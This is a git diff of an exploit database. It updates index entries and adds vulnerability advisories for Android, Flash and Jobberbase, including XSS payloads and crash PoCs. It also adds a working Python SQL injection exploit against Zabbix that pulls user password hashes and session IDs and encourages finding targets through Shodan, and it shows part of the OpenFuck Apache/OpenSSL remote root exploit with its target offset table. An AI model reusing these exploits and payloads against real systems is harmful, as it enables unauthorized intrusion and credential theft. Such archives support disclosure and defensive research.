 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
 39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,Metasploit,linux,remote,443
 39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
@@ -36288,8 +36296,8 @@ id,file,description,date,author,platform,type,port
 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80
 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0
 40113,platforms/linux/remote/40113.txt,"OpenSSHD 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22
-40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Post-Authentication Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
-40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Post-Authentication SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
+40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
+40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
 40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0
 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
@@ -36333,7 +36341,7 @@ id,file,description,date,author,platform,type,port
 40159,platforms/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80
 40160,platforms/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps,0
 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
-40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000
+40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000
 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80
 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) vmci.sys - (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0
 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
@@ -36345,13 +36353,13 @@ id,file,description,date,author,platform,type,port
 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
 40174,platforms/php/webapps/40174.txt,"WordPress Ultimate Product Catalog 3.9.8 Plugin - (do_shortcode via ajax) Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80
 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
-40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000
-40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Post-Authentication Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000
+40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000
+40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000
 40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80
 40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shell with Port (44 / 52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
 40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi Filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443
 40184,platforms/multiple/dos/40184.html,"WebKit - TypedArray.copyWithin Memory Corruption",2016-07-29,"Google Security Research",multiple,dos,0
-40185,platforms/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Post-Authentication Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80
+40185,platforms/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Authenticated Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80
 40189,platforms/php/webapps/40189.txt,"WordPress Booking Calendar Plugin 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",php,webapps,80
 40190,platforms/php/webapps/40190.txt,"WordPress WP Live Chat Support Plugin 6.2.03 - Persistent Cross-Site Scripting",2016-08-01,"Dennis Kerdijk & Erwin Kievith",php,webapps,80
 40191,platforms/php/webapps/40191.txt,"WordPress ALO EasyMail NewsLetter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) Cross-Site Request Forgery",2016-08-01,"Yorick Koster",php,webapps,80
@@ -36386,7 +36394,7 @@ id,file,description,date,author,platform,type,port
 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
 40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0
-40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Pre-Authentication Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80
+40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80
 40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80
 40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80
@@ -36471,7 +36479,7 @@ id,file,description,date,author,platform,type,port
 40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088
 40325,platforms/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery",2016-08-31,LiquidWorm,jsp,webapps,8088
 40326,platforms/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088
-40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
+40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
 40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
diff --git a/platforms/android/remote/40354.txt b/platforms/android/remote/40354.txt
new file mode 100755
index 000000000..3d58d5b11
--- /dev/null
+++ b/platforms/android/remote/40354.txt
@@ -0,0 +1,160 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=840
+
+There's an inconsistency between the way that the two functions in libutils/Unicode.cpp handle invalid surrogate pairs in UTF16, resulting in a mismatch between the size calculated by utf16_to_utf8_length and the number of bytes written by utf16_to_utf8.
+
+This results in a heap-buffer-overflow; one route to this code is the String8 constructor initialising a String8 from a String16. This can be reached via binder calls to the core system service "android.security.keystore" from a normal app context without any additional permissions. There are probably other routes to reach this code with attacker controlled data.
+
+ssize_t utf16_to_utf8_length(const char16_t *src, size_t src_len)
+{
+  if (src == NULL || src_len == 0) {
+    return -1;
+  }
+
+  size_t ret = 0;
+  const char16_t* const end = src + src_len;
+  while (src < end) {
+    if ((*src & 0xFC00) == 0xD800 && (src + 1) < end
+        && (*++src & 0xFC00) == 0xDC00) { // <---- increment src here even if condition is false
+      // surrogate pairs are always 4 bytes.
+      ret += 4;
+      src++;
+    } else {
+      ret += utf32_codepoint_utf8_length((char32_t) *src++); // <---- increment src again
+    }
+  }
+  return ret;
+}
+
+void utf16_to_utf8(const char16_t* src, size_t src_len, char* dst)
+{
+  if (src == NULL || src_len == 0 || dst == NULL) {
+    return;
+  }
+
+  const char16_t* cur_utf16 = src;
+  const char16_t* const end_utf16 = src + src_len;
+  char *cur = dst;
+  while (cur_utf16 < end_utf16) {
+    char32_t utf32;
+    // surrogate pairs
+    if((*cur_utf16 & 0xFC00) == 0xD800 && (cur_utf16 + 1) < end_utf16
+       && (*(cur_utf16 + 1) & 0xFC00) == 0xDC00) { // <---- no increment if condition is false
+      utf32 = (*cur_utf16++ - 0xD800) << 10;
+      utf32 |= *cur_utf16++ - 0xDC00;
+      utf32 += 0x10000;
+    } else {
+      utf32 = (char32_t) *cur_utf16++; // <---- increment src
+    }
+    const size_t len = utf32_codepoint_utf8_length(utf32);
+    utf32_codepoint_to_utf8((uint8_t*)cur, utf32, len);
+    cur += len;
+  }
+  *cur = '\0';
+}
+
+An example character sequence would be the following:
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+
+This will be processed by utf16_to_utf8_len like this:
+
+first loop iteration:
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+^
+invalid surrogate; skip at (*++src & 0xfc00 == 0xdc00)
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+         ^ 
+         invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++))
+
+second loop iteration:
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+                  ^ 
+                  invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++))
+
+And will be processed by utf16_to_utf8 like this:
+
+first loop iteration:
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+^
+invalid surrogate; write 0 length character to output
+
+second loop iteration
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+         ^ 
+         valid surrogate pair 0xd841 0xdc41; emit length 4 character to output
+
+We can then construct a crash PoC using this sequence for the String16 passed to the keystore method 'getKeyCharacteristics' that will perform the String8(String16&) constructor on attacker supplied input; and provide a massive input string. The crash PoC should write 0x20000 * 2/3 bytes into a 2 byte heap allocation. It has been tested on a recent nexus5x userdebug build; resulting in the following crash (the object backing an android::vectorImpl has been corrupted by the overwrite, and "\xf0\xa0\x91\x81" is the utf8 encoding for the utf16 "\x41\xd8 \x41\xdc"):
+
+pid: 16669, tid: 16669, name: keystore  >>> /system/bin/keystore <<<
+signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x91a0f08191a110
+    x0   8191a0f08191a108  x1   0000000000000000  x2   0000000000000000  x3   0000000000000020
+    x4   00000000ffffffa0  x5   0000000000000010  x6   0000000000000001  x7   0000007f802c0018
+    x8   0000000000000000  x9   000000000a7c5ac5  x10  0000000000000000  x11  0000000000000000
+    x12  000000000000d841  x13  0000000000000841  x14  0000000000000041  x15  0000007f8067bd9e
+    x16  0000005565984f08  x17  0000007f80aeee48  x18  00000000ffffff91  x19  0000007fd1de26c0
+    x20  8191a0f08191a108  x21  8191a0f08191a0f0  x22  0000000000000000  x23  0000005565984000
+    x24  8191a0f08191a0f0  x25  0000007fd1dea7b8  x26  0000007f806690e0  x27  0000007fd1de25d0
+    x28  000000556596f000  x29  0000007fd1de2550  x30  0000005565961188
+    sp   0000007fd1de2550  pc   0000007f80aeee58  pstate 0000000060000000
+
+backtrace:
+    #00 pc 0000000000016e58  /system/lib64/libutils.so (_ZN7android10VectorImpl13editArrayImplEv+16)
+    #01 pc 000000000000a184  /system/bin/keystore
+    #02 pc 00000000000112d0  /system/bin/keystore
+    #03 pc 000000000000b7f4  /system/lib64/libkeystore_binder.so (_ZN7android17BnKeystoreService10onTransactEjRKNS_6ParcelEPS1_j+1560)
+    #04 pc 0000000000024c9c  /system/lib64/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+168)
+    #05 pc 000000000002dd98  /system/lib64/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+1240)
+    #06 pc 000000000002de4c  /system/lib64/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+140)
+    #07 pc 000000000002def4  /system/lib64/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+76)
+    #08 pc 0000000000007a04  /system/bin/keystore (main+1940)
+    #09 pc 000000000001bc98  /system/lib64/libc.so (__libc_init+100)
+    #10 pc 0000000000007c20  /system/bin/keystore
+
+######################################################
+
+Actually you can compromise many native system services using this bug (ie those not implemented in Java); because of the interface token checking code in Parcel.cpp. See attached for another PoC that takes as a first command line argument the name of the service to crash. On my nexus 5x with very unscientific testing, this includes the following services:
+
+ - phone, iphonesubinfo, isub (com.android.phone)
+ - telecom, voiceinteraction, backup, audio, location, notification, connectivity, wifi, network_management, statusbar, device_policy, mount, input_method, window, content, account, telephony.registry, user, package, batterystats (system_server)
+ - media.audio_policy, media.audio_flinger (mediaserver)
+ - drm.drmManager (drmserver)
+ - android.security.keystore (keystore)
+ - SurfaceFlinger (surfaceflinger)
+ 
+bool Parcel::enforceInterface(const String16& interface,
+                              IPCThreadState* threadState) const
+{
+    int32_t strictPolicy = readInt32();
+    if (threadState == NULL) {
+        threadState = IPCThreadState::self();
+    }
+    if ((threadState->getLastTransactionBinderFlags() &
+         IBinder::FLAG_ONEWAY) != 0) {
+      // For one-way calls, the callee is running entirely
+      // disconnected from the caller, so disable StrictMode entirely.
+      // Not only does disk/network usage not impact the caller, but
+      // there's no way to commuicate back any violations anyway.
+      threadState->setStrictModePolicy(0);
+    } else {
+      threadState->setStrictModePolicy(strictPolicy);
+    }
+    const String16 str(readString16());
+    if (str == interface) {
+        return true;
+    } else {
+        ALOGW("**** enforceInterface() expected '%s' but read '%s'",
+                String8(interface).string(), String8(str).string());
+        return false;
+    }
+}
+
+
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40354.zip
+
diff --git a/platforms/multiple/dos/40355.txt b/platforms/multiple/dos/40355.txt
new file mode 100755
index 000000000..738d281e8
--- /dev/null
+++ b/platforms/multiple/dos/40355.txt
@@ -0,0 +1,32 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=845
+
+There is an info leak in the Transform.colorTranform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform.
+
+A minimal PoC is as follows:
+
+this.createEmptyMovieClip( "mc", 1);
+var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4);
+var t:Transform = new Transform( mc );
+t.colorTransform = c;
+this.createTextField( "tf", 2, 0, 0, 2000, 200);
+var ct = ColorTransform;
+var g = flash.geom;
+g.addProperty("ColorTransform", func, func);
+var q = t.colorTransform;
+tf.text = q.greenMultiplier + "\n" + q.blueMultiplier + "\n" + q.color;
+
+function func(){
+	
+	mc.removeMovieClip();
+	
+	return ct;
+	
+	}
+
+
+A sample swf and fla are attached. The PoC prints the value of unallocated memory to the screen.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40355.zip
+
diff --git a/platforms/multiple/dos/40356.txt b/platforms/multiple/dos/40356.txt
new file mode 100755
index 000000000..cf0f1c12f
--- /dev/null
+++ b/platforms/multiple/dos/40356.txt
@@ -0,0 +1,21 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846
+
+If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free. A minimal PoC is as follows:
+
+var mc =  this.createEmptyMovieClip( "mc", 1);
+mc.addProperty( "f", func, func );
+mc.f("hello");
+
+function func(){
+	
+	mc.removeMovieClip();
+	// Fix heap
+	var d:Date = new Date();
+	return d.getDate;
+	
+	}	
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40356.zip
+
diff --git a/platforms/php/webapps/40351.txt b/platforms/php/webapps/40351.txt
new file mode 100755
index 000000000..b65dd3d30
--- /dev/null
+++ b/platforms/php/webapps/40351.txt
@@ -0,0 +1,40 @@
+Jobberbase:			http://www.jobberbase.com/
+Version:			2.0
+By Ross Marks: 		http://www.rossmarks.co.uk
+
+1) Local path disclosure - change any variable to an array and in most cases it will tell you the local path where the application is installed
+	eg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js
+	returns: Array to string conversion in <b>/var/www/jobberbase/_lib/class.Job.php</b>
+
+2) Open redirect - when submitting an application can change "Referer:" header to anything and will redirect there
+
+3) reflect XSS in username - http://example.com/admin/
+		eg. "><script>alert(1)</script>
+	reflect XSS in search: http://example.com/search/|<img src="x" onError="alert(1)">/
+
+4) persistant XSS on admin backend homepage
+		create a job and give the URL:
+		" onhover="alert(1)
+	persistant XSS - admin add to category name (no protection)
+
+5) unrestricted file upload
+	upload CV accepts any filetype appends _ uniqueid() to filename
+	eg. "file.php" becomes "file_<uniqueid>.php"
+	uniquid in in insecure method for generating random sequences and is based on microtime
+	if the server is using an older version of PHP a null byte can be used 
+	ie. "test.php%00.php" would be uploaded as "test.php"
+
+6) code execution race condition:
+	if the admin has chosen to not store uploaded CV's 
+	they are first moved from /tmp to the writable /upload directory before being unlinked
+	this gives a brief window of opportunity for an attacker to run http://example.com/uploads/file.php before it is deleted
+
+7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js
+	days_behind parameter is vulnerable
+
+** notes **
+
+admin change password page don't need old password, no csrf token just a simple POST request.
+admin password stored in md5 format unsalted
+cookies do NOT have "secure" or "HTTPonly" flags enabled
+no csrf anywhere
diff --git a/platforms/php/webapps/40353.py b/platforms/php/webapps/40353.py
new file mode 100755
index 000000000..162ae3489
--- /dev/null
+++ b/platforms/php/webapps/40353.py
@@ -0,0 +1,56 @@
+# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
+# Data: 20-08-2016
+# Software Link: www.zabbix.com
+# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
+# Version: Zabbix 2.0-3.0.x(<3.0.4)
+
+# PoC Author: Zzzians
+# Contact: Zzzians@gmail.com
+# Test on: Linux (Debian/CentOS/Ubuntu)
+
+# -*- coding: utf_8 -*-
+# Use Shodan or and enjoy :)
+# Comb the intranet for zabbix and enjoy :)
+import sys,os,re,urllib2
+def Inject(url,sql,reg):
+    payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
+        sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
+    try:
+        response = urllib2.urlopen(payload, timeout=20).read()
+    except Exception, msg:
+        print '\t\tOpps,an error occurs...',msg
+    else:
+        result_reg = re.compile(reg)
+        results = result_reg.findall(response)
+        print payload #Uncomment this to see details
+        if results:
+            return results[0]
+def exploit(url,userid):
+    passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
+    session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
+    password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
+    if(password):
+        print '[+]Username~Password : %s' % password
+    else:
+        print '[-]Get Password Failed'
+    session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
+    if(session_id):
+        print "[+]Session_id：%s" % session_id
+    else:
+        print "[-]Get Session id Failed"
+    print '\n'
+        
+def main():
+    print '=' * 70
+    print '\t    2.0.x?  <  Zabbix  <  3.0.4 SQL Inject Python Exploit Poc'
+    print '\t\t    Author:Zzzians(Zzzians@gmail.com)'
+    print '\t    Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
+    print '\t\t\t    Time：2016-08-20\n'
+    urls = ["http://10.15.5.86"]
+    ids = [1,2]
+    for url in urls:
+        if url[-1] != '/': url += '/'
+        print '='*25 +  url + '='*25
+        for userid in ids:
+	        exploit(url,userid)
+main()
diff --git a/platforms/unix/remote/21671.c b/platforms/unix/remote/21671.c
index 345ead72f..1513b6692 100755
--- a/platforms/unix/remote/21671.c
+++ b/platforms/unix/remote/21671.c
@@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/5363/info
 
 A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
@@ -5,6 +6,7 @@ A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
 The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition.
 
 ***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available. 
+*/
 
 /*
  * VERY PRIV8 spabam SPAX@zone-h.org
diff --git a/platforms/unix/remote/21672.c b/platforms/unix/remote/21672.c
deleted file mode 100755
index 1612d8af0..000000000
--- a/platforms/unix/remote/21672.c
+++ /dev/null
@@ -1,1303 +0,0 @@
-source: http://www.securityfocus.com/bid/5363/info
- 
-A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
- 
-The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition.
- 
-***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available. 
-
-/*
- * OF version r00t VERY PRIV8 spabam
- * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
- * objdump -R /usr/sbin/httpd|grep free to get more targets
- * #hackarena irc.brasnet.org
- */
-
-#include <arpa/inet.h>
-#include <netinet/in.h>
-#include <sys/types.h>
-#include <sys/socket.h>
-#include <netdb.h>
-#include <errno.h>
-#include <string.h>
-#include <stdio.h>
-#include <unistd.h>
-
-#include <openssl/ssl.h>
-#include <openssl/rsa.h>
-#include <openssl/x509.h>
-#include <openssl/evp.h>
-
-/* update this if you add architectures */
-#define MAX_ARCH 138
-
-struct archs {
-	char* desc;
-	int func_addr;	/* objdump -R /usr/sbin/httpd | grep free */
-} architectures[] = {
-
-        {
-                "Caldera OpenLinux (apache-1.3.26)",
-                0x080920e0
-        },
-	{
-		"Cobalt Sun 6.0 (apache-1.3.12)",
-		0x8120f0c
-	},
-	{
-		"Cobalt Sun 6.0 (apache-1.3.20)",
-		0x811dcb8
-	},
-	{
-		"Cobalt Sun x (apache-1.3.26)",
-		0x8123ac3
-	},
-	{
-		"Cobalt Sun x Fixed2 (apache-1.3.26)",
-		0x81233c3
-	},
-	{
-		"Conectiva 4 (apache-1.3.6)",
-		0x08075398
-	},
-	{
-		"Conectiva 4.1 (apache-1.3.9)",
-		0x0808f2fe
-	},
-	{
-		"Conectiva 6 (apache-1.3.14)",
-		0x0809222c
-	},
-	{
-		"Conectiva 7 (apache-1.3.12)",
-		0x0808f874
-	},
-	{
-		"Conectiva 7 (apache-1.3.19)",
-		0x08088aa0
-	},
-	{
-		"Conectiva 7/8 (apache-1.3.26)",
-		0x0808e628
-	},
-	{
-		"Conectiva 8 (apache-1.3.22)",
-		0x0808b2d0
-	},
-	{
-		"Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)",
-		0x08095264
-	},
-	{
-		"Debian GNU Linux (apache_1.3.19-1)",
-		0x080966fc
-	},
-	{
-		"Debian GNU Linux (apache_1.3.22-2)",
-		0x08096aac
-	},
-	{
-		"Debian GNU Linux (apache-1.3.22-2.1)",
-		0x08083828
-	},
-	{
-		"Debian GNU Linux (apache-1.3.22-5)",
-		0x08083728
-	},
-	{
-		"Debian GNU Linux (apache_1.3.23-1)",
-		0x08085de8
-	},
-	{
-		"Debian GNU Linux (apache_1.3.24-2.1)",
-		0x08087d08
-	},
-        {       "Debian Linux GNU Linux 2 (apache_1.3.24-2.1)",
-	        0x080873ac
-	},
-	{
-		"Debian GNU Linux (apache_1.3.24-3)",
-		0x08087d68
-	},
-	{
-		"Debian GNU Linux (apache-1.3.26-1)",
-		0x0080863c4
-	},
-	{
-		"Debian GNU Linux 3.0 Woody (apache-1.3.26-1)",
-		0x080863cc
-	},
-	{       "Debian GNU Linux (apache-1.3.27)",
-	        0x0080866a3
-	},
-
-
-{ "FreeBSD (apache-1.3.9)", 0xbfbfde00 },
-{ "FreeBSD (apache-1.3.11)", 0x080a2ea8 },
-{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7f58 },
-{ "FreeBSD (apache-1.3.12.1.40)", 0x080a0ec0 },
-{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7e7c },
-{ "FreeBSD (apache-1.3.12.1.40_1)", 0x080a7f18 },
-{ "FreeBSD (apache-1.3.12)", 0x0809bd7c },
-{ "FreeBSD (apache-1.3.14)", 0xbfbfdc00 },
-{ "FreeBSD (apache-1.3.14)", 0x080ab68c },
-{ "FreeBSD (apache-1.3.14)", 0x0808c76c },
-{ "FreeBSD (apache-1.3.14)", 0x080a3fc8 },
-{ "FreeBSD (apache-1.3.14)", 0x080ab6d8 },
-{ "FreeBSD (apache-1.3.17_1)", 0x0808820c },
-{ "FreeBSD (apache-1.3.19)", 0xbfbfdc00 },
-{ "FreeBSD (apache-1.3.19_1)", 0x0808c96c },
-{ "FreeBSD (apache-1.3.20)", 0x0808cb70 },
-{ "FreeBSD (apache-1.3.20)", 0xbfbfc000 },
-{ "FreeBSD (apache-1.3.20+2.8.4)", 0x0808faf8 },
-{ "FreeBSD (apache-1.3.20_1)", 0x0808dfb4 },
-{ "FreeBSD (apache-1.3.22)", 0xbfbfc000 },
-{ "FreeBSD (apache-1.3.22_7)", 0x0808d110 },
-{ "FreeBSD (apache_fp-1.3.23)", 0x0807c5f8 },
-{ "FreeBSD (apache-1.3.24_7)", 0x0808f8b0 },
-{ "FreeBSD (apache-1.3.24+2.8.8)", 0x080927f8 },
-{ "FreeBSD 4.6.2-Release-p6 (apache-1.3.26)", 0x080c432c },
-{ "FreeBSD 4.6-Realease (apache-1.3.26)", 0x0808fdec },
-{ "FreeBSD (apache-1.3.27)", 0x080902e4 },
-
-
-	{
-		"Gentoo Linux (apache-1.3.24-r2)",
-		0x08086c34
-	},
-	{
-		"Linux Generic (apache-1.3.14)",
-		0xbffff500
-	},
-	{
-		"Mandrake Linux X.x (apache-1.3.22-10.1mdk)",
-		0x080808ab
-	},
-	{
-		"Mandrake Linux 7.1 (apache-1.3.14-2)",
-		0x0809f6c4
-	},
-	{
